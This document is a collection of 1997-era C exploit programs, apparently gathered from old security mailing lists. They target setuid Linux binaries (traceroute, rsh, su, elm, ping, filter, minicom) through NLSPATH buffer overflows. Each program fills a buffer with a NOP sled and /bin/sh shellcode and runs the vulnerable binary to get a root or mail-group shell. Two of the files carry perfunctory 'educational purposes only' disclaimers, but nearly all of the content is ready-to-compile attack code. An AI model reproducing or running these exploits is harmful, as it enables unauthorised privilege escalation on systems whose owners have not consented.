/*
  SLACKWARE Traceroute Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997
  Created: 8/15/97

  Give thanks to Solar Designer for his su overflow, this is based
  on that peice of work.

  This is for educational purposes only, in no way am I responsible 
  for what you do with this.  This should be used by sys admins, or
  people who have permission of the admin to run it to see if this
  hole can exist on their system.  If you use it for the wrong reasons
  then I say *tisk* on you.  I will not be held responsible for your 
  actions.
  
  This could be done with a generic overflow program, but just
  running this is easier.
 
  USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T
  MESSAGE ANYBODY ON IRC ABOUT THIS.

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";
char *get_sp() {
   asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main() {
  int i;
  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3072;
  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));
  buffer[bufsize - 1] = 0;
  system("clear");
  printf("______________________________________________________________________________\n");
  printf("| Traceroute Overflow -- (c) shit-head 1997\n");
  printf("| Give props to Solar Designer for his su overflow, this is based on that.\n");
  printf("|\n");
  printf("| Peep's to: suid, knowy, thugzsta, you all be 2 cool.\n");
  printf("|\n");
  printf("| *NOTE* I'm not responsible if you abuse this. Run only w/ premission\n");
  printf("| Sending Overflow.... Done.\n");
  printf("------------------------------------------------------------------------------\n");
  setenv("NLSPATH", buffer, 1);
  execl("/usr/bin/traceroute", "/usr/bin/traceroute", NULL);
}
 
===========================================================================

/* 
  SLACKWARE RSH Buffer OverFlow -- (c) shit-head (w0nky@usa.net) 1997
  Created: 8/15/97

  Give thanks to Solar Designer for his su overflow, this is based
  on that peice of work.

  This is for educational purposes only, in no way am I responsible 
  for what you do with this.  This should be used by sys admins, or
  people who have permission of the admin to run it to see if this
  hole can exist on their system.  If you use it for the wrong reasons
  then I say *tisk* on you.  I will not be held responsible for your 
  actions.
  
  This could be done with a generic overflow program, but just
  running this is easier.
 
  USAGE OF THIS DOES NOT GIVE YOU TECH SUPPORT SO DON'T
  MESSAGE ANYBODY ON IRC ABOUT THIS.

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";
char *get_sp() {
   asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main() {
  int i;
  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3072;
  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));
  buffer[bufsize - 1] = 0;
  setenv("NLSPATH", buffer, 1);
  system("clear");
  printf("______________________________________________________________________________\n");
  printf("| RSH Overflow -- (c) shit-head 1997\n");
  printf("| Give props to Solar Designer for his su overflow, this is based on that.\n");
  printf("|\n");
  printf("| Peep's to: suid, knowy, thugzsta, you all be reet.\n");
  printf("|\n");
  printf("| *NOTE* I'm not responsible if you abuse this. Run only w/ premission\n");
  printf("| Sending Overflow.... Done.\n");
  printf("------------------------------------------------------------------------------\n");
  execl("/usr/bin/rsh", "/usr/bin/rsh", NULL);
}
 

======================================================================

/*
 * NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
 * Copyright (c) 1997 by Solar Designer
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 2048
char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3072;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("NLSPATH", buffer, 1);

  execl("/bin/su", "/bin/su", NULL);
}



=====================================================================

/*
       Linux elm exploit. Gives effective group id of mail.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 2048
char buffer[bufsize];

main(argc, argv) 
unsigned int argc;
char **argv;
{
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3300 ;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("NLSPATH", buffer, 1);

  execl("/usr/bin/elm", "/usr/bin/elm", NULL);
}


====================================================================

/*
 *    ping-exploit (gives root via nlspath environment variable)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 2048
char buffer[bufsize];

main() {
  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - 3029;

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("NLSPATH", buffer, 1);

  execl("/bin/ping", "/bin/ping", NULL);
}


=======================================================================

/*
 * Exploit for /usr/bin/filter - get egid of mail
 * Usage: cc -o f f.c
 *        ./f 750
 *        $ id
 *        uid=501(foo) gid=100(users) egid=12(mail)
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

char *shellcode =
  "\x31\xc0\xb0\x31\xcd\x80\x93\x31\xc0\xb0\x17\xcd\x80\x68\x59\x58\xff\xe1"
  "\xff\xd4\x31\xc0\x99\x89\xcf\xb0\x2e\x40\xae\x75\xfd\x89\x39\x89\x51\x04"
  "\x89\xfb\x40\xae\x75\xfd\x88\x57\xff\xb0\x0b\xcd\x80\x31\xc0\x40\x31\xdb"
  "\xcd\x80/"
  "/bin/sh"
  "0";

char *get_sp() {
   asm("movl %esp,%eax");
}

#define bufsize 2048
char buffer[bufsize];

main(int argc, char **argv) 
{

  int i;

  for (i = 0; i < bufsize - 4; i += 4)
    *(char **)&buffer[i] = get_sp() - atoi(argv[1]);

  memset(buffer, 0x90, 512);
  memcpy(&buffer[512], shellcode, strlen(shellcode));

  buffer[bufsize - 1] = 0;

  setenv("NLSPATH", buffer, 1);

  execl("/usr/bin/filter", "filter", NULL);
}

=====================================================================

 /* Minicom Exploit by _PHANTOM_ */
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>
 
#define path "/usr/bin/minicom"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50
 
u_long get_esp() 
{ 
  __asm__("movl %esp, %eax"); 
 
}
 
main(int argc, char **argv)
{
  u_char execshell[] = 
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
 
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;
   
   int i;
   int ofs = DEFAULT_OFFSET;
   
   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
 
   /* fill start of buffer with nops */
 
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
 
   /* stick asm code into the buffer */
 
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;
 
   (void)alarm((u_int)0);
   setenv("NLSPATH",buff,1);
   execl(path, "minicom", buff, NULL);
}


========================================================================================